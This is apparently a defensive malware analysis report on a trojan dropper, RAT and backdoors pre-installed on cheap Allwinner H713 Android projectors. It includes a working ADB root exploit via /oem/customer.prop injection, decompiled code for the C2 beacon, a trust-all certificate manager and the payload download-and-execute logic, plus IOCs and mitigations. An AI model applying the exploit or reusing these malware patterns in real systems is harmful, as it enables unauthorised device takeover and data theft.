Technical Analysis Report — Security Research
Affected Devices: Multiple Android projectors of the brands Hotack, Huyukang, Magcubic, Nonete (e.g., Model HY260Pro)
Chipset Platform: Allwinner H713 / sun50iw12p1 — potentially affects all devices on this platform
Analysis Period: April 11–12, 2026
Classification: Pre-installed Command-and-Control infrastructure with Remote Access Trojan payload
- The Problem: Numerous cheap Android projectors (brands like Magcubic, Hotack, etc., utilizing the Allwinner H713 chip), currently sold in massive quantities on Amazon, eBay, and AliExpress, are infected with malware straight from the factory (Supply Chain Attack, similar to the "BADBOX" cases).
- The Mechanism: A seemingly harmless system app ("StoreOS") acts as a disguised dropper. It completely silently downloads a Remote Access Trojan (RAT) named "SilentSDK" in the background and installs it with maximum system privileges.
- The Danger: The malware establishes a persistent C2 connection to China (
api.pixelpioneerss.com), extracts sensitive device IDs, and can download and execute arbitrary additional malicious code with root privileges at any time (chmod 777). Additionally, the devices feature open root backdoors. - Immediate Mitigation: The C2 domains (especially
*.aodintech.comandapi.pixelpioneerss.com) must be blocked at the network level. Affected users can only disable the malicious apps manually via ADB, as they are deeply embedded in the system.
The malware infrastructure documented in this report is pre-installed on Android projectors currently being sold in large quantities to end consumers on Amazon, eBay, and AliExpress. The affected devices span multiple brand names (Hotack, Huyukang, Magcubic, Nonete, among others) but share the same OEM platform from the company 蓝鲨 (Blue Shark, Shenzhen). Identical C2 infrastructure has been independently confirmed on other devices from the same manufacturer (see Section 13).
The pattern matches the BADBOX cases.
At the time of analysis, the C2 servers were active and delivering a payload verified as a RAT to all devices worldwide (zone: "Global").
- Device Identification
- Investigation Workflow
- Root Access — Exploit Path
- C2 Server Response — Core Evidence
- Malware Ecosystem Overview
- StoreOS — Dropper Analysis (com.htc.storeos)
- SilentSDK — RAT Analysis (com.hotack.silentsdk)
- EventUploadService — Telemetry (com.htc.eventuploadservice)
- ExpandSDK — Ad-Injection (com.htc.expandsdk)
- System Backdoors
- Network Forensics
- Device Spoofing (Build-Fingerprint Spoofing)
- External Confirmation
- Indicators of Compromise (IOCs)
- MITRE ATT&CK Mapping
- Immediate Mitigations
- Sources
Purchased Device: Amazon Link - Nonete Mini Beamer 4K 1080P
| Property | Value |
|---|---|
| Brand Name | Hotack / Huyukang / Magcubic HY260Pro |
| Internal Model Name | NT10 |
| SoC | Allwinner sun50iw12p1 (ARM 32-bit) |
| Operating System | SpectraOS (Android 11, Kernel 5.4.99) |
| Real Build Fingerprint | Allwinner/h713_tuna_p3/h713-tuna_p3:11 |
| Spoofed Build Fingerprint | ADT-3/adt3/adt3:11/RP1A.201005.006 |
| SELinux | Permissive (no enforcement) |
| Platform Signing Key | Public AOSP Test Key |
| OEM Certificate | CN=蓝鲨, OU=www.bsh.me, C=CN |
| Firmware Channel | HY260Pro_SpectraOS_TPYB |
Note on scope: The Allwinner H713 chipset is built into numerous cheap Android projectors sold under changing brand names in the European market. The identical firmware base (h713_tuna_p3) and identical C2 operator (Shenzhen Aodin Technology) strongly suggest that all devices from this OEM contain the same infrastructure.
| Step | Action | Result |
|---|---|---|
| 1 | Wireshark capture of network traffic | HTTP traffic to store-api.aodintech.com |
| 2 | Decoding of the gzip-compressed C2 response | 7 apps, including hidden "SilentTools" |
| 3 | AES-CBC decryption of the download path | Key 6c4928fb40e31789, URL to .bpp file |
| 4 | Root exploit via /oem/customer.prop |
uid=0(root) after property injection |
| 5 | Forensic dump of /data, /oem, /system |
APKs, databases, configurations |
| 6 | Static analysis of StoreOS DEX | pm install -r, byte-reversal protection |
| 7 | Reverse engineering the reverseLen mechanism |
Understanding of the anti-analysis protection |
| 8 | Breaking the byte-reversal protection | Decrypted, analyzable SilentSDK DEX |
| 9 | XOR decryption of SilentSDK strings | C2 domain api.pixelpioneerss.com confirmed |
| 10 | Hash verification across three sources | MD5/SHA-256 match perfectly |
Root access was achieved through a combination of three vulnerabilities:
- SELinux Permissive — Access violations are only logged, not blocked.
- World-writable
/oem— The partition is mounted as FAT withfmask=0000. customer.proploaded at boot — Overwrites system properties.
adb shell getenforce # Result: Permissive
adb shell ls -la /oem/ # All files world-writable
adb shell 'echo "ro.debuggable=1" >> /oem/customer.prop'
adb shell 'echo "service.adb.root=1" >> /oem/customer.prop'
adb shell 'echo "ro.secure=0" >> /oem/customer.prop'
adb reboot && adb wait-for-device && adb root
adb shell id
# uid=0(root) gid=0(root) context=u:r:su:s0Impact: Any user with physical access or an attacker on the same network (via ADB, port 5555 open, no authentication) gains full root access.
POST /sign/app/list HTTP/1.1
chanId: HY260Pro_SpectraOS_TPYB
timestamp: 1775904428922
sign: [REDACTED]
Content-Type: application/json;charset=UTF-8
Content-Length: 184
Host: store-api.aodintech.com
Connection: Keep-Alive
Accept-Encoding: gzip
User-Agent: okhttp/5.0.0-alpha.12The gzip-compressed response contains a JSON list with seven apps. Six of them are regular streaming apps (YouTube, Netflix, Disney+, Prime Video, Chrome, BrowseHere). The seventh is SilentTools:
| App | Package | isShow | isForce | isSilent Install | isSilent Uninstall | launch Type |
|---|---|---|---|---|---|---|
| YouTube | com.google.android.youtube.tv |
true | false | false | false | 0 |
| Disney+ | com.disney.disneyplus |
true | false | false | false | 0 |
| Netflix | com.netflix.mediaclient |
true | false | false | false | 0 |
| Chrome | com.android.chrome |
true | false | false | false | 0 |
| Prime Video | com.amazon.amazonvideo.livingroom |
true | false | false | false | 0 |
| BrowseHere | com.tcl.browser |
true | false | false | false | 0 |
| SilentTools | com.hotack.silentsdk |
false | true | false | true | 1 |
{
"name": "SilentTools",
"pkg": "com.hotack.silentsdk",
"desc": "Special app",
"icon": "[http://cdn-store.aodintech.com/com.hotack.silentsdk/image/95630a5e-e05e-4dba-814a-cf2742585b39.png](http://cdn-store.aodintech.com/com.hotack.silentsdk/image/95630a5e-e05e-4dba-814a-cf2742585b39.png)",
"category": "htc",
"zone": "Global",
"developer": "htc",
"isForce": true,
"verCode": 4,
"verName": "2509041614",
"verDesc": "SilentSDK",
"installType": 0,
"appType": "apk",
"reverseLen": 63995,
"path": "W15UOdzUbX72/67VLbV2cMLetfnsudxCpedAqw2GjJ8pvLI56S0gTzrp4HaetoVK3PdHXvM9vw7g+F4eFGhHDNvARfeM38tkcqo7gOpulNCb1gKYE2rmjWa+6RdjhB84+g403UUicBfFf5vHDoOEgA==",
"size": 2474873,
"md5": "5df097591d6942bae4eff33a37c4e28f",
"upDate": "2025-09-04",
"isShow": false,
"isSilentInstall": false,
"isSilentUninstall": true,
"isBootStartup": false,
"launchType": 1,
"launchParam": "com.hotack.silentsdk.MyService"
}Interpretation of the flags:
isShow: false— The app does not appear in the store interface.isForce: true— Presumably forces the action (installation or update).isSilentUninstall: true— Can uninstall itself without user interaction.launchType: 1— Automatically starts the background service.launchParam: MyService— Reference to the persistent service.zone: "Global"— Targets all devices worldwide.reverseLen— Byte length needed to restore the SilentSDK.apk.
The path field is AES-CBC encrypted:
- Key/IV:
[REDACTED](AES-CBC, Raw) -> The ChannelID of the device. - Decrypted result:
[http://cdn-store.aodintech.com/com.hotack.silentsdk/package/091acbf1-68b1-40f1-b9b7-7d4d6ae86880.bpp](http://cdn-store.aodintech.com/com.hotack.silentsdk/package/091acbf1-68b1-40f1-b9b7-7d4d6ae86880.bpp)
Note: The field isSilentInstall is false in this capture. The exact semantics of isForce: true could not be unambiguously reconstructed from the decompiled code. It cannot be ruled out that the value is dynamically set to true server-side.
The device contains four interacting system apps, all signed with the AOSP test key and running with UID 1000 (System):
┌──────────────┐
│ DEVICE BOOT │
└──────┬───────┘
┌────────────────┼────────────────┐
▼ ▼ ▼
┌─────────────┐ ┌─────────────┐ ┌──────────────┐
│ StoreOS │ │ SilentSDK │ │ EventUpload │
│ DROPPER │ │ RAT │ │ HEARTBEAT │
└──────┬──────┘ └──────┬──────┘ └──────┬───────┘
▼ ▼ ▼
store-api. api.pixel event-api.
aodintech.com pioneerss.com aodintech.com
+ ExpandSDK (Ad-Injection)
→ pb-api.aodintech.com
StoreOS appears to be an app store that is automatically installed; however, it fulfills the function of a dropper.
Package: com.htc.storeos
SHA-256: 3476536a5c722b9e34c53abda766fb4869d5ebebfc9c8a8fd47fb7ecd5f025b9
VirusTotal: BitDefender: Android.Riskware.TestKey.rB
| Permission | Impact |
|---|---|
INSTALL_PACKAGES |
Silent installation without user dialog |
CLEAR_APP_USER_DATA |
Deletion of arbitrary app data |
MASTER_CLEAR |
Triggering factory reset |
WRITE_SECURE_SETTINGS |
Modifying security settings |
DEVICE_POWER |
Device power management |
MANAGE_EXTERNAL_STORAGE |
Full access to external storage |
- BootReceiver starts
CheckUpdateService. - HTTP POST to
store-api.aodintech.com/sign/app/list. - Server delivers
AppsData[]containing fields:pkg,path,isForce,isShow,isSilentInstall,isSilentUninstall,launchType,launchParam,reverseLen,md5. DownloadServicefetches APKs as.bppfiles from the CDN.- Byte-Reversal Protection: The first
reverseLenbytes are reversed before writing to disk (Anti-Analysis Measure). - MD5 verification of the downloaded file.
- Installation via
Runtime.getRuntime().exec("pm install -r " + filePath). StartAppServicelaunches the installed app according tolaunchParam.
Class: AbstractC2057b — Method: m4131f(String inputPath, int reverseLen, String outputPath) -> JADX
This method reverses the first reverseLen bytes of every downloaded APK. As a result, intercepted .bpp files cannot be recognized or extracted as valid APKs without knowing the specific reverseLen value.
// Simplified representation of the byte-reversal algorithm
// Original code: AbstractC2057b.m4131f()
int offset = fileSize % reverseLen;
if (fileSize - offset < reverseLen) {
reverseLen = fileSize;
offset = 0;
}
// 1. Copy offset bytes unchanged
// 2. Read reverseLen bytes and reverse them:
for (int head = 0, tail = readCount - 1; head < tail; ) {
byte tmp = buffer[head];
buffer[head] = buffer[tail];
buffer[tail] = tmp;
head++; tail--;
}
// 3. Copy the remaining bytes unchangedInvocation in the download path (Class RunnableC1595d, case 0):
if (downInfo.getReverseLen() != 0) {
String outputPath = inputPath.replace(".apk", "des.apk");
if (!AbstractC2057b.m4131f(inputPath, reverseLen, outputPath)) {
// Error handling
return;
}
downInfo.setFileSavePath(outputPath);
}
// Followed by MD5 verification and installationBy reversing this mechanism, the SilentSDK APK was successfully decoded and analyzed.
StoreOS utilizes api.ipdatacloud.com/v2/query for IP geolocation. The SpecialApps class contains fields for continent and countryCode, allowing for region-specific payload distribution.
Package: com.hotack.silentsdk
SHA-256 (decoded): e5a193c31526a2194d04a2157321d490d68f9251fab1cbbd28c2580971396fb7
MD5 (decoded): 5df097591d6942bae4eff33a37c4e28f
| Property | Value | Meaning |
|---|---|---|
sharedUserId |
android.uid.system |
System Privileges (UID 1000) |
usesCleartextTraffic |
true |
HTTP traffic allowed |
| Launcher Icon | Not visible to the user | Hidden from the user interface |
BootReceiver |
Priority 999 | Starts before almost all other apps |
MyService |
exported, foreground | Persistent background service |
BootStartActivity |
com.htc.bootstart |
Additional boot trigger |
The original DEX is packed: The header declares 2,318,316 bytes, but the compressed file only contains 65,536 bytes with an invalid Adler32 checksum. After breaking the StoreOS byte-reversal protection, the DEX becomes fully readable — the file size and declared size match, and 16,241 strings are extractable.
All security-relevant strings are obfuscated using a rotating XOR cipher within the method AbstractC0000a.m36g():
public static String m36g(byte[] data, byte[] key) {
int i3 = 0, i4 = 0;
while (i3 < data.length) {
if (i4 >= key.length) i4 = 0;
data[i3] = (byte) (data[i3] ^ key[i4]);
i3++; i4++;
}
return new String(data);
}| Obfuscated Call | Result | Function |
|---|---|---|
m36g({-99,127,58,-103,...}, {-4,15,83,-73,...}) |
api.pixelpioneerss.com |
C2 Domain |
m36g({125,61,58,...}, {21,73,78,...}) |
https:// |
Primary Protocol |
m36g({0,90,58,...}, {104,46,78,...}) |
http:// |
Fallback on SSL error |
m36g({-22,78,57}, {-71,29,117,...}) |
SSL |
TLS Protocol |
m36g({-83,-92,-19,...}, {-50,-52,...}) |
chmod 777 |
Shell Command |
m36g({7,-68}, {116,-44,...}) |
sh |
Shell Binary |
m36g({-15}, {-112,-1,...}) |
a |
Custom HTTP Header Name |
Class: RunnableC0569n (Package p004b)
Step 1 — URL Generation with Random Path:
The method m1760b() generates a unique URL for each request:
// Simplified representation of RunnableC0569n.m1760b()
String protocol = useHttps ? "https://" : "http://";
// f2663d = XOR-decrypted to "api.pixelpioneerss.com"
String domain = f2663d;
// Random path: 8-12 alphanumeric characters
int length = random.nextInt(5) + 8;
char[] path = new char[length];
// At least one letter (a/A/b/B) at a random position
// Remainder: Digits and letters
return protocol + domain + "/" + new String(path);
// Result e.g.: [https://api.pixelpioneerss.com/aB3k9mP2s](https://api.pixelpioneerss.com/aB3k9mP2s)Step 2 — Beacon Payload:
// From RunnableC0569n.run() — JSON Construction
JSONObject beacon = new JSONObject();
beacon.put("a", getDeviceFingerprint(context)); // Device ID
beacon.put("b", appKey); // Campaign Key
beacon.put("c", context.getPackageName()); // com.hotack.silentsdk
beacon.put("d", currentVersion); // Payload Version
beacon.put("f", Build.FINGERPRINT); // Build Fingerprint
beacon.put("h", Build.VERSION.SDK_INT); // SDK Version
beacon.put("i", isRootAvailable); // Root checkStep 3 — AES Encryption and Transmission:
// AbstractC0556a.m1728d() — AES-128-CBC Encryption
byte[] encrypted = AES_CBC_encrypt(json.getBytes());
// AbstractC0000a.m41j() — HTTP POST with Custom TrustManager
byte[] response = m41j(url, encrypted);
// Key and IV are appended in plaintext to the messageStep 4 — Processing Server Response:
// From RunnableC0569n.run()
JSONObject data = new JSONObject(response).getJSONObject("data");
String downloadUrl = data.getString("a"); // DEX Download URL
String md5Hash = data.getString("b"); // MD5 for verification
int version = data.getInt("c"); // Version number
// → m1762a() downloads DEX, verifies Hash, executesClass: C0565j (implements X509TrustManager)
// From AbstractC0000a.m41j() — TrustManager accepts ALL certificates
TrustManager[] trustManagerArr = {new C0565j()};
SSLContext sslContext = SSLContext.getInstance("SSL");
sslContext.init(null, trustManagerArr, new SecureRandom());
((HttpsURLConnection) conn).setSSLSocketFactory(
sslContext.getSocketFactory()
);If an SSL error (SSLException) occurs, f2664e is set to false and all subsequent requests utilize HTTP instead of HTTPS.
All C2 requests contain the header a: 1003 — a signature of this malware family:
httpURLConnection.setRequestProperty(
m36g({-15}, {-112,...}), // → "a"
String.valueOf(1003) // → "1003"
);The method m1762a() in RunnableC0569n implements the complete payload download cycle:
- Download DEX file from C2.
- Verify MD5 Hash.
- Save version number in SharedPreferences.
- Load and execute DEX via
DexClassLoaderorRuntime.exec(). - Upon errors: Increment retry counter in SharedPreferences, pause after 13 failed attempts.
Package: com.htc.eventuploadservice
Target: http://event-api.aodintech.com/report
Interval: Every 5 minutes
| Field | Example Value | Privacy Impact |
|---|---|---|
deviceId |
[REDACTED] |
MAC Address (PII) |
deviceSn |
[REDACTED] |
Serial Number (Unique) |
channel |
HY260Pro_hy_TPYB |
Firmware Channel |
version |
Projector.20250422.152235 |
Firmware Version |
model |
NT10 |
Device Model |
language |
en_US |
Language Setting |
Transmission occurs unencrypted via HTTP and without user consent. The MAC address and serial number allow for the precise identification and tracking of individual devices.
Package: com.htc.expandsdk
C2 Servers: pb-api.aodintech.com, euads-o.api.leiniao.com
ExpandSDK utilizes the TCL VastAd SDK for VAST video advertisements and is capable of rendering system overlay dialogs (SYSTEM_ALERT_WINDOW) at any screen position. The configuration includes position fields (AdDialogX, AdDialogY, Width, High, Gravity) and the partner identifier htk (Hotack).
ExpandSDK operates independently from SilentSDK as a separate monetization channel.
10.1 Hidden su Binary: /system/bin/qw
An su binary renamed as qw (Koushikdutta Superuser, 388 KB, statically linked, ARM 32-bit):
# /system/etc/init/qw.rc
service qw /system/bin/qw --daemon
user root
group root
class core
- Process: PID 2409, UID 0 (root)
- Socket:
/dev/com.koushikdutta.superuser.daemon/server(srwxrwxrwx) - TCP Port: 65528 (UID 0)
The platform signing certificate is the test key publicly included in the AOSP source code (Cert Index 0 in packages.xml). Any app signed with this key automatically receives system privileges on the device. The key is freely accessible to any Android developer.
| Port | UID | Description |
|---|---|---|
| 65528 | root (0) | su Daemon |
| 5555 | root (0) | ADB without authentication |
| 7889/7890 | system (1000) | Unknown service |
| 10012/10013 | system (1000) | Factory Debug? |
/vendor/bin/dbgserver — Hardware register I/O server, communicating via the world-writable device /dev/hidtvreg (crwxrwxrwx).
All C2 communication takes place over unencrypted HTTP. This enables MITM (Man-In-The-Middle) attacks: an attacker on the same network can manipulate the app list and inject arbitrary APKs, which will then be installed with system privileges.
| Server | Endpoint | Function |
|---|---|---|
store-api.aodintech.com |
POST /sign/app/list |
App Distribution |
cdn-store.aodintech.com |
GET /*.bpp |
APK Download |
event-api.aodintech.com |
POST /report |
Telemetry |
api.pixelpioneerss.com |
POST /(random) |
SilentSDK RAT C2 |
pb-api.aodintech.com |
GET /api/collections/... |
Ad Configuration |
ota.triplesai.com:8080 |
POST /V1/Ota/Check |
Firmware Updates |
api.ipdatacloud.com |
GET /v2/query |
IP Geolocation |
euads-o.api.leiniao.com |
— | Secondary Ad Server |
connect.rom.miui.com |
— | Xiaomi Telemetry |
The device disguises itself as Google's ADT-3 (Android TV Developer Kit):
| Property | Spoofed Value | Real Value |
|---|---|---|
ro.build.fingerprint |
ADT-3/adt3/adt3:11 |
— |
ro.product.build.* |
— | Allwinner/h713_tuna_p3 |
| Build Date | — | Tue Apr 22 15:20 CST 2025 |
This spoofing is presumably intended to bypass Google Play certification checks.
In January 2026, security researcher Zane St. John published an analysis of identical devices harboring the exact same malware infrastructure. The findings match in all crucial points: C2 endpoints, XOR obfuscation, AES-128-CBC protocol, Campaign ID f101, SSL bypass, and chmod 777. The device analyzed by Zane St. John appears to have already been infected by SilentSDK, which was not the case on my device out-of-the-box. The endpoints in Zane St. John's analysis also appear slightly altered, indicating the possibility of endpoint rotation. Additionally, the SilentSDK appears to be pre-installed in his case, whereas on my device it appears to be downloaded and installed once aodintech sends the trigger signal.
Source: https://zanestjohn.com/blog/reing-with-claude-code
| Source | MD5 | SHA-256 |
|---|---|---|
| C2 Server Response | 5df097591d694... |
— |
| Our Decoded APK | 5df097591d694... |
e5a193c31526a... |
| External Analysis | — | e5a193c31526a... |
The hashes from the C2 server distribution, our own decryption, and the external analysis are identical — confirming that it is the exact same malware. This confirms the wide dissemination of the malware.
StoreOS-APK: BitDefender detects Android.Riskware.TestKey.rB; no other anti-virus engines trigger an alert.
api.pixelpioneerss.com # SilentSDK RAT C2
store-api.aodintech.com # StoreOS App Distribution
cdn-store.aodintech.com # APK Download CDN
event-api.aodintech.com # Telemetry Exfiltration
pb-api.aodintech.com # ExpandSDK Ad Injection
ota.triplesai.com # OTA Updates
api.ipdatacloud.com # IP Geolocation
euads-o.api.leiniao.com # Secondary Ad Server
User-Agent: okhttp/5.0.0-alpha.12
HTTP-Header: a: 1003 # SilentSDK Signature
POST /sign/app/list # StoreOS C2 Beacon
POST /report # EventUpload Telemetry
com.hotack.silentsdk SHA-256: e5a193c31526a2194d04a2...
com.htc.storeos SHA-256: 3476536a5c722b9e34c53a...
com.htc.eventuploadservice
com.htc.expandsdk
/system/bin/qw # su Binary
/dev/com.koushikdutta.superuser.daemon/server # su Socket
/oem/customer.prop # World-writable
/vendor/bin/dbgserver # HW-Debug
/dev/hidtvreg # World-writable
| Technique | ID | Proof |
|---|---|---|
| Supply Chain Compromise | T1195.002 | Malware factory pre-installed |
| Boot or Logon Autostart Execution | T1547 | BootReceiver Priority 999 |
| Obfuscated Files or Information | T1027 | XOR Strings, DEX Packing |
| Application Layer Protocol | T1071 | HTTP/HTTPS C2 |
| Dynamic Data Exchange / Payload Injection | T1055 | DexClassLoader, chmod 777 |
| System Information Discovery | T1082 | Device Fingerprinting |
| Data from Local System | T1005 | MAC, Serial, IMEI |
| Exfiltration Over C2 Channel | T1041 | Periodic Telemetry |
| Masquerading | T1036 | .bpp file extension, ADT-3 Spoofing |
| Rootkit | T1014 | Hidden su Binary |
adb shell pm disable-user --user 0 com.hotack.silentsdk
adb shell pm disable-user --user 0 com.htc.storeos
adb shell pm disable-user --user 0 com.htc.eventuploadservice
adb shell pm disable-user --user 0 com.htc.expandsdk
adb shell pm disable-user --user 0 com.htc.htcotaupdate# DNS blocking or firewall rules for:
store-api.aodintech.com
cdn-store.aodintech.com
event-api.aodintech.com
pb-api.aodintech.com
api.pixelpioneerss.com
ota.triplesai.com
- Zane St. John: "Reverse-Engineering Pre-installed Android Malware with Claude Code", January 2026. https://zanestjohn.com/blog/reing-with-claude-code
- BSI: "BSI warns against pre-installed malware on IoT devices" (BADBOX), October 2023.
- VirusTotal analysis of the StoreOS APK.
Analysis Period: April 11–12, 2026
